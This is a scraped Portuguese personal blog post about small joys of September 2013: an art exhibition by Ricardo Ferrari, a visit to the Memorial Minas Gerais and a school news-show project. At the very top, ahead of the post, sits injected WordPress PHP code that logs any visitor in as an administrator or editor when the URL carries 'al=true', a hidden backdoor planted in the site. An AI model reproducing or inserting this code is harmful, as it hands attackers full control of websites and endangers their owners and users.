// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Pequenas Alegrias de Setembro • A Menina da Janela

fotografia

29 de setembro de 2013

Mais um mês está chegando ao fim, e venho com mais uma postagem para a tag “Pequenas Alegrias”!

Bom, esse mês não fiz tantas coisas, mas tudo o que fiz foi muuito especial e mereceu um post aqui… Vamos lá conferir o que aprontei então? Cliquem nas fotos para ampliar!
21 de Setembro – Exposição Quintais de Ferrari, de Ricardo Ferrari

Aah blogger, deixa de ser chato? Deixa minha foto na posição certa? :/
Quadro de cima: a pintura de Ricardo Ferrari
Quadro de baixo: Escultura de… oops! Que vergoonha, esqueci o nome ç.ç, vou me informar e já já atualizo ok? 
E o nome do quadro? A menina da Janela!


Blogger, como assim você fica virando minhas fotos? Assim não vale!
Fui à exposição “Quintais de Ferrari”, no Museu Inimá de Paula. Não sei nem o que dizer sobre a exposição… está simplesmente fantástica! Da uma vontadezinha de ficar lá por horas e horas e horas sabe? Tudo lindo: as obras, o lugar…tudo deixando a sensação de que você está em outro mundo e um gostinho de quero mais!
Ferrari é um artista maravilhoso e uma pessoa mais maravilhosa ainda… Conheço-o daquele sitio em Rio Acima  (já comentei aqui e em outras postagens), e sou encantada com ele: seu jeito de falar, de abraçar, de viver, e é lógico: com seus batatinhas! (batatinhas são os “bonequinhos” das pinturas>.<) 
Bom, pra quem é de BH (ou não) e quiser visitar a exposição ousaber um pouco mais sobre oFerrari, estão aí o site dele e o folder da exposição:
site: http://www.rferrari.com/
Folder (cliquem para ampliar):

21 de Setembro – Memorial Minas Gerais, da Vale

Igrejinha de uma maquete liiinda 🙂

Bom, o memorial é bem isso: Ver, ouvir e sentir… 
Fala sério, essa construção antiga é maravilhosa né?
Mapa de Minas que tem até as cidades que são menores que meu bairro… kkk ^^

~oi pernas~ Sofá maravilhooso (e eu me sentindo toda chique nele haha)
Algumas coisinhas antigas: bússola, crucifixo, barbeador, cofre…
Muito amor esse potinho *-*
Saí da exposição e fui direto pro Circuito Cultural Praça da Liberdade, no prédio do memorial de Minas Gerais, da Vale… lá é tudo perfeito também: o prédio é lindo, a escadaria do predio é PERFEITA, tem  muuitas coisas antigas, “recortes” de jornais de datas históricas, fotos, muuita informação interessante e tudo com uma carinha bem mineira mesmo… amei!
24 de Setembro – Jornal Ontem (trabalho de Português)
Equipe do Jornal Ontem 🙂
Nosso “microfone” e nosso “tablet” 🙂
Equipes do Jornal Ontem e Parceiros da Record(outro grupo que apresentou no mesmo dia)!
Mais uma coisa deliciosa desse mês: Minha professora de português passou um trabalho no qual deveríamos criar e apresentar um jornal televisivo… foi fantástico! Todos os grupos fizeram trabalhos legais, e as apresentações renderam altas risadas, mas foram ótimas!
O nome do jornal do meu grupo (Ester, Izadora, Gabriel, Petter e Thainá) foi Jornal Ontem (a ironia é nosso forte!), e foi super criativo. Eu estava de jaqueta e toda “certinha”, mas o calor não me deixou tirar fotos assim. Nosso microfone era um pirulito “do Chaves” e nosso tablet uma bandejinha de isopor “personalizada”… legal né? 
   
 É isso pessoal… me contem o que acharam da postagem e das fotos (ok, elas são de celular porque a lerdinha aqui esquece a máquina mais que sei lá o que, e o blogger ainda virou algumas, mas… ) ok? 
Beijos, e até a próxima!

Você também vai gostar

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Este site utiliza o Akismet para reduzir spam. Saiba como seus dados em comentários são processados.

8 Comments